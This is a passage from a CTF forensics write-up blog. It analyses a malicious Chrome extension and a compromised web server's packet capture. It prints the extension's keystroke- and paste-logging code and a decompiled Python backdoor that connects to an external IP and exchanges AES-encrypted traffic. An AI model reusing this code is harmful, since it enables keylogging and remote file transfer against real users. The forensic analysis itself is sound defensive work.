string\">\"Enter\"</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token operator\">!</span>s<span class=\"token punctuation\">.</span><span class=\"token function\">startsWith</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASTE\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>  <span class=\"token punctuation\">{</span>\n        s <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">|</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>s<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">|</span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>s <span class=\"token operator\">===</span> <span class=\"token string\">\"Enter\"</span> <span class=\"token operator\">||</span> s<span class=\"token punctuation\">.</span><span class=\"token function\">startsWith</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASTE\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        s <span class=\"token operator\">=</span> s <span class=\"token operator\">+</span> <span class=\"token string\">\"\\r\\n\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"log\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">data</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>data<span class=\"token punctuation\">.</span>log<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            data<span class=\"token punctuation\">.</span>log <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n\n        data<span class=\"token punctuation\">.</span>log <span class=\"token operator\">+=</span> s<span class=\"token punctuation\">;</span>\n\n        chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">set</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token string-property property\">'log'</span><span class=\"token operator\">:</span> data<span class=\"token punctuation\">.</span>log <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span>onConnect<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">port</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">assert</span><span class=\"token punctuation\">(</span>port<span class=\"token punctuation\">.</span>name <span class=\"token operator\">===</span> <span class=\"token string\">\"conn\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"v1.2.1\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    port<span class=\"token punctuation\">.</span>onMessage<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\"><span class=\"token punctuation\">{</span> type<span class=\"token punctuation\">,</span> data <span class=\"token punctuation\">}</span></span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>type <span class=\"token operator\">===</span> <span class=\"token string\">'key'</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span> <span class=\"token keyword\">else</span> <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>type <span class=\"token operator\">==</span> <span class=\"token string\">'paste'</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token function\">addLog</span><span class=\"token punctuation\">(</span><span class=\"token string\">'PASTE:'</span> <span class=\"token operator\">+</span> data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\nchrome<span class=\"token punctuation\">.</span>runtime<span class=\"token punctuation\">.</span>onMessage<span class=\"token punctuation\">.</span><span class=\"token function\">addListener</span><span class=\"token punctuation\">(</span>\n    <span class=\"token keyword\">function</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">request<span class=\"token punctuation\">,</span> sender<span class=\"token punctuation\">,</span> sendResponse</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>request<span class=\"token punctuation\">.</span>check <span class=\"token operator\">===</span> <span class=\"token string\">\"replace_html\"</span> <span class=\"token operator\">&amp;&amp;</span> chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"replace_html\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token function\">sendResponse</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">url</span><span class=\"token operator\">:</span> chrome<span class=\"token punctuation\">.</span>storage<span class=\"token punctuation\">.</span>local<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'replace_html_url'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>So, by searching the file list again for files under <code class=\"language-text\">C:\\\\Users\\selene\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nnjofihdjilebhiiemfmdlpbdkbjcpae</code>, I was able to identify the Flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 4. After examining the malicious extention's code, what is the log filename in which the datais stored</span>\n000003.log</code></pre></div>\n<p>Next, dumping this log file let me determine that the next Flag was <code class=\"language-text\">drive.google.com</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ca38dcb03e8c46b76852451c1cabcae6/bb5d0/image-20250327223202684.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyklEQVQI1xWOT0/CUBDE+0n4077X1hbe4xWl1NLQCgEN8WbizXjR4MGbicH43X+Oh8nu7MzObpQbwy7LaMqSbuHZq79PU1pjSRPDXHozGrEaj7meTDDiLo7pVFv56qKgKAuqJKGdTon+xS8NP8OSH+85O8clBN5lrqxhkefUWU6vhSGJqVPLUtrKWnrhoPmteCMEPRPd6OpLcUVzd2LYPbIdThy7gbN3fMt0UejrbMZDvWbfbTkIx3bDk/N8zB2/Cn3TwedQ0a8b/gAkoWBG6HE2nQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ca38dcb03e8c46b76852451c1cabcae6/8ac56/image-20250327223202684.webp 240w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/d3be9/image-20250327223202684.webp 480w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/e46b2/image-20250327223202684.webp 960w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/f992d/image-20250327223202684.webp 1440w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/05fe0/image-20250327223202684.webp 1453w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ca38dcb03e8c46b76852451c1cabcae6/8ff5a/image-20250327223202684.png 240w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/e85cb/image-20250327223202684.png 480w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/d9199/image-20250327223202684.png 960w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/07a9c/image-20250327223202684.png 1440w,\n/static/ca38dcb03e8c46b76852451c1cabcae6/bb5d0/image-20250327223202684.png 1453w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ca38dcb03e8c46b76852451c1cabcae6/d9199/image-20250327223202684.png\"\n            alt=\"image-20250327223202684\"\n            title=\"image-20250327223202684\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 5. What is the URL the user navigated to</span>\ndrive.google.com</code></pre></div>\n<p>By continuing to read the same log, I was also able to determine the final Flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 744px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0450c150a381627ff1cc80a6433929d2/cab8c/image-20250327223409715.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAZUlEQVQI11XKSwoCMRBF0V5LpSSpTwcH2io4Etz/kq6d2CAODgX31VJKYRCR35VvU9XpfxOk7D2vnNYN7TfUz3MbFncnM3FzIoLWGqPZofcVs6OZEW40C2J70R9v8r67POdPrZUPDNY616TMWlkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0450c150a381627ff1cc80a6433929d2/8ac56/image-20250327223409715.webp 240w,\n/static/0450c150a381627ff1cc80a6433929d2/d3be9/image-20250327223409715.webp 480w,\n/static/0450c150a381627ff1cc80a6433929d2/43142/image-20250327223409715.webp 744w\"\n              sizes=\"(max-width: 744px) 100vw, 744px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0450c150a381627ff1cc80a6433929d2/8ff5a/image-20250327223409715.png 240w,\n/static/0450c150a381627ff1cc80a6433929d2/e85cb/image-20250327223409715.png 480w,\n/static/0450c150a381627ff1cc80a6433929d2/cab8c/image-20250327223409715.png 744w\"\n            sizes=\"(max-width: 744px) 100vw, 744px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0450c150a381627ff1cc80a6433929d2/cab8c/image-20250327223409715.png\"\n            alt=\"image-20250327223409715\"\n            title=\"image-20250327223409715\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 6. What is the password of selene@rangers.eldoria.com</span>\nclip-mummify-proofs</code></pre></div>\n<h2 id=\"toolpieforensic\" style=\"position:relative;\"><a href=\"#toolpieforensic\" aria-label=\"toolpieforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ToolPie(Forensic)</h2>\n<blockquote>\n<p>In the bustling town of Eastmarsh, Garrick Stoneforge’s workshop site once stood as a pinnacle of enchanted lock and toolmaking. But dark whispers now speak of a breach by a clandestine faction, hinting that Garrick’s prized designs may have been stolen. Scattered digital remnants cling to the compromised site, awaiting those who dare unravel them. Unmask these cunning adversaries threatening the peace of Eldoria. Investigate the incident, gather evidence, and expose Malakar as the mastermind behind this attack.</p>\n</blockquote>\n<p>Analyzing the provided pcap file showed that it contained logs from when exploit code was injected from outside.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 828px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/798c45708351c72bfdca40593e00245c/8efc2/image-20250323133536717.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 59.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACY0lEQVQoz5WSyU9TURTG359gYVE2lqFErLR0oJiQSIgxYUwsU9XWlRsTN0ZYiKLWQktjUgRrXZgQjNGNklRXuiUa6DzSFlpMJDFIW4oboMG48PPc+0qjMS5c/HKG+93vnHfzhJOqNpzW69HW2ooz7e1QKBSoq6/HcZkMstpaTlV1NY5JJJBUVf2FVCpFTU1NBcFy4zpykSjC79/hzfw8jAMD6OvqwgWKjIuDgzAbjTAND8NMXKLaNDQE88gIjzqtFqeam6FUKjnCg4nb+Pl5EyseDzxkuPTqNZ45ndzEaDDA0NODgf5+GPr6eH6+uxuG3t4KWjJkRiqViiM470zgeyaLg7U1HGaz2Fxexou5R7hiMuFsRwcaGhtxoqnpnxyZVTZ02ybxxefH87k5vHS5YBkbw7nOTjTTZ2jUamg0mj9hvd9QM1paRNQtEBy3bmLjw0fYxsdxmd5Ir9NBVlcHOW3GtmuQy/8LYfTaVSwtLuLtwgKezszgicMBt92OxwybjeOenhb7FN12m3g+NSWelXUuq5Xngos++cfGJ+zGYzhYX0cpk6H3TPM33U+lsJ9OUZ/laewlk5Uzlu+nkmJMU726ynXCrNWCvUQCWz4vcqEQtoNBbAcC+Or387i1ssxzjs9HmiCPR3VF5/XyKMxOWlCiidskzDNDEhQiYXyjyYVIBDmqd6JRTj4c4hreDwSpF+E574XDRAjCw/t3UaLPYZtVDsmQ5bwOioN2YrHyxZBoTnm+fKcQjpQjM7TewyH9hzmaUEzEubhIT8BgU9lF1i/G4yjQRlxD5hwy2V0Vtewey38BIk1uvvyRudwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/798c45708351c72bfdca40593e00245c/8ac56/image-20250323133536717.webp 240w,\n/static/798c45708351c72bfdca40593e00245c/d3be9/image-20250323133536717.webp 480w,\n/static/798c45708351c72bfdca40593e00245c/712de/image-20250323133536717.webp 828w\"\n              sizes=\"(max-width: 828px) 100vw, 828px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/798c45708351c72bfdca40593e00245c/8ff5a/image-20250323133536717.png 240w,\n/static/798c45708351c72bfdca40593e00245c/e85cb/image-20250323133536717.png 480w,\n/static/798c45708351c72bfdca40593e00245c/8efc2/image-20250323133536717.png 828w\"\n            sizes=\"(max-width: 828px) 100vw, 828px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/798c45708351c72bfdca40593e00245c/8efc2/image-20250323133536717.png\"\n            alt=\"image-20250323133536717\"\n            title=\"image-20250323133536717\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0f665239a3ef8cc3edbebbe2876dd3e0/709cb/image-20250323133418826.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.416666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAT0lEQVQI1yXI6wpAMABAYe//z22bzVzCo2hE0gop73JofnydOpHZJGrOqb1Gr5LmNFhfoBdBd1v6y9IeJvzhqeg/5a4QLkVOGckYhwr3ewGIlTwzWoA2bwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0f665239a3ef8cc3edbebbe2876dd3e0/8ac56/image-20250323133418826.webp 240w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/d3be9/image-20250323133418826.webp 480w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/e46b2/image-20250323133418826.webp 960w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/43c62/image-20250323133418826.webp 1034w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0f665239a3ef8cc3edbebbe2876dd3e0/8ff5a/image-20250323133418826.png 240w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/e85cb/image-20250323133418826.png 480w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/d9199/image-20250323133418826.png 960w,\n/static/0f665239a3ef8cc3edbebbe2876dd3e0/709cb/image-20250323133418826.png 1034w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0f665239a3ef8cc3edbebbe2876dd3e0/d9199/image-20250323133418826.png\"\n            alt=\"image-20250323133418826\"\n            title=\"image-20250323133418826\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From the IP and path information at this point, I was able to identify the first two Flags.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># 1. What is the IP address responsible for compromising the website?</span>\n<span class=\"token number\">194.59</span>.6.66\n\n<span class=\"token comment\"># 2. What is the name of the endpoint exploited by the attacker?</span>\nexecute</code></pre></div>\n<p>Looking at the exploit code executed here, I found that it loads and executes bytecode by passing data decompressed with <code class=\"language-text\">bz2.decompress</code> into <code class=\"language-text\">marshal.loads</code>.</p>\n<p>So, in order to disassemble this code with <code class=\"language-text\">dis</code>, I ran the following script using Python 3.13.</p>\n<p>To load executable code with <code class=\"language-text\">marshal.loads</code>, you need to match the Python version to the bytecode being loaded.</p>\n<p>With the default-installed Python 3.10 and Python 3.12, it failed partway through with an error, and I could not load the full code.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> add-apt-repository ppa:deadsnakes/ppa\n<span class=\"token function\">sudo</span> <span class=\"token function\">apt</span> <span class=\"token function\">install</span> python3.13-full\npython3.13 -m ensurepip --upgrade</code></pre></div>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> marshal\n<span class=\"token keyword\">import</span> bz2\n<span class=\"token keyword\">import</span> dis\n\npayload <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token string\">b\"&lt;payload>\"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> payload<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token string\">'unicode_escape'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">'latin1'</span><span class=\"token punctuation\">)</span>\n\ndec <span class=\"token operator\">=</span> bz2<span class=\"token punctuation\">.</span>decompress<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>dec<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># marshal.loads を行うためには Python のバージョンを合わせる必要がある</span>\ncode_obj <span class=\"token operator\">=</span> marshal<span class=\"token punctuation\">.</span>loads<span class=\"token punctuation\">(</span>dec<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>code_obj<span class=\"token punctuation\">)</span>\n\ndis<span class=\"token punctuation\">.</span>dis<span class=\"token punctuation\">(</span>code_obj<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Disassembling the executed code with the script above let me identify the third Flag as <code class=\"language-text\">Py-Fuscate</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># 3. What is the name of the obfuscation tool used by the attacker?</span>\nPy<span class=\"token operator\">-</span>Fuscate</code></pre></div>\n<p>Furthermore, based on the following result obtained by having OpenAI decompile the disassembled bytecode, I was also able to recover the fourth Flag, the IP, and the fifth Flag, the key, from the packet capture.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> socket\n<span class=\"token keyword\">import</span> threading\n<span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> random\n<span class=\"token keyword\">import</span> string\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span class=\"token keyword\">import</span> pad<span class=\"token punctuation\">,</span> unpad\n\nBUFFER_SIZE <span class=\"token operator\">=</span> <span class=\"token number\">4096</span>\nSEPARATOR <span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;SEPARATOR>\"</span>\nCONN <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\n\n<span class=\"token comment\"># AES暗号化関数</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">enc_mes</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    cypher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_CBC<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    cypher_block <span class=\"token operator\">=</span> <span class=\"token number\">16</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">type</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token builtin\">bytes</span><span class=\"token punctuation\">:</span>\n        mes <span class=\"token operator\">=</span> mes<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">return</span> cypher<span class=\"token punctuation\">.</span>encrypt<span class=\"token punctuation\">(</span>pad<span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> cypher_block<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># AES復号化関数</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">dec_mes</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> mes <span class=\"token operator\">==</span> <span class=\"token string\">b''</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> mes\n    cypher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_CBC<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    cypher_block <span class=\"token operator\">=</span> <span class=\"token number\">16</span>\n    <span class=\"token keyword\">return</span> unpad<span class=\"token punctuation\">(</span>cypher<span class=\"token punctuation\">.</span>decrypt<span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> cypher_block<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># ファイルを受信する関数</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">receive_file</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    client2 <span class=\"token operator\">=</span> socket<span class=\"token punctuation\">.</span>socket<span class=\"token punctuation\">(</span>socket<span class=\"token punctuation\">.</span>AF_INET<span class=\"token punctuation\">,</span> socket<span class=\"token punctuation\">.</span>SOCK_STREAM<span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>connect<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">'13.61.7.218'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">54163</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n    k <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>SystemRandom<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>choice<span class=\"token punctuation\">(</span>string<span class=\"token punctuation\">.</span>ascii_letters <span class=\"token operator\">+</span> string<span class=\"token punctuation\">.</span>digits<span class=\"token punctuation\">)</span> <span class=\"token keyword\">for</span> _ <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>k<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n    enc_received <span class=\"token operator\">=</span> client2<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span>BUFFER_SIZE<span class=\"token punctuation\">)</span>\n    received <span class=\"token operator\">=</span> dec_mes<span class=\"token punctuation\">(</span>enc_received<span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n    filename<span class=\"token punctuation\">,</span> filesize <span class=\"token operator\">=</span> received<span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span>SEPARATOR<span class=\"token punctuation\">)</span>\n\n    ok_enc <span class=\"token operator\">=</span> enc_mes<span class=\"token punctuation\">(</span><span class=\"token string\">'ok2'</span><span class=\"token punctuation\">,</span> k<span class=\"token punctuation\">)</span>\n    client2<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>ok_enc<span class=\"token punctuation\">)</span>\n\n    total_bytes <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    msg <span class=\"token operator\">=</span> <span class=\"token string\">b''</span>\n\n   